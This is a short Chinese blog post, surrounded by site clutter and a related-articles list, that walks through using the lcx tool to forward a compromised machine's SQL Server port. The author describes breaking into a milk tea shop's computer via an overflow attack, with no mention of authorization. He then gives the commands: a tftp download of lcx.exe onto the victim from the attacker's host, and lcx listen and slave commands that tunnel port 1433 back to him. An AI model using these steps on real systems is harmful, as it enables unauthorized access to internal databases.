博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
LCX端口内网映射转发
阅读量:5953 次
发布时间:2019-06-19

本文共 642 字,大约阅读时间需要 2 分钟。

  这几天在渗透一家奶茶店的时候, 使用溢出攻击获得了奶茶店shell, 截屏以后发现该电脑有安装sqlserver, 但是数据库无法远程连接, 所以我决定使用端口映射工具突破端口连接限制;

  我的机器地址为:192.168.1.156

  奶茶店的IP地址为: 192.168.1.157

  1:上传lcx到目标机器

  首先需要下载lcx这个工具:

  

  Lcx这个工具我使用tftp上传到目标机器, 在目标的shell中执行:

tftp -i 192.168.1.156 get lcx.exe

  2:使用lcx监听本地端口

  然后执行lcx命令, 并绑定 本地的1434端口和51端口 :

lcx -listen 51 1434

  

  3:在目标shell中执行端口转发

  目标机器的地址是192.168.1.157 , 我的机器地址为192.168.1.156:

lcx -slave 192.168.1.156 51 192.168.1.157 1433

  这条命令会把目标机器的1433端口转发到 192.168.1.156的51端口上

  使用sqlservermanager连接本地机器, 连接的地址为本地机器IP的1433端口:

  OVER, 连接成功

 

作者:

出处:
企业网站:
开源博客:
QQ:287101329
微信:18101055830 

厦门点燃未来网络科技有限公司, 是厦门最好的微信应用, 小程序, 微信网站, 公众号开发公司

转载地址:http://ofoxx.baihongyu.com/

你可能感兴趣的文章
以太坊本地开发环境搭建
查看>>
图说 WebAssembly(二):JIT 编译器
查看>>
多线程设计模式 - Future模式
查看>>
android清理缓存动画、天气APP、购物下单选择器、阅读APP、饿了么demo等源码
查看>>
驳《我不是很懂 Node.js 社区的 DRY 文化》
查看>>
《Spring In Action(第4版)》阅读总结(四)渲染Web视图
查看>>
CGI、PHP-CGI、FastCGI
查看>>
PhoneGap极光推送 cordova消息推送
查看>>
Subarray Sum Equals K
查看>>
preventDefault, stopPropagation, stopImmediatePropagation 三者的区别
查看>>
王下邀月熊_Chevalier的前端每周清单系列文章索引
查看>>
js设计模式之观察者模式和发布/订阅模式
查看>>
Mac上以太坊Geth环境安装
查看>>
基于Netty模拟解析Binlog
查看>>
零配置构建工具:parcel
查看>>
算法题解:找出包含给定字符的最小窗口(枚举的一般方法)
查看>>
lodash源码分析之baseFindIndex中的运算符优先级
查看>>
MySQL数据库规范及解读
查看>>
用 Go 构建一个区块链 -- Part 5: 地址
查看>>
vscode+sftp 开发模式环境的同步
查看>>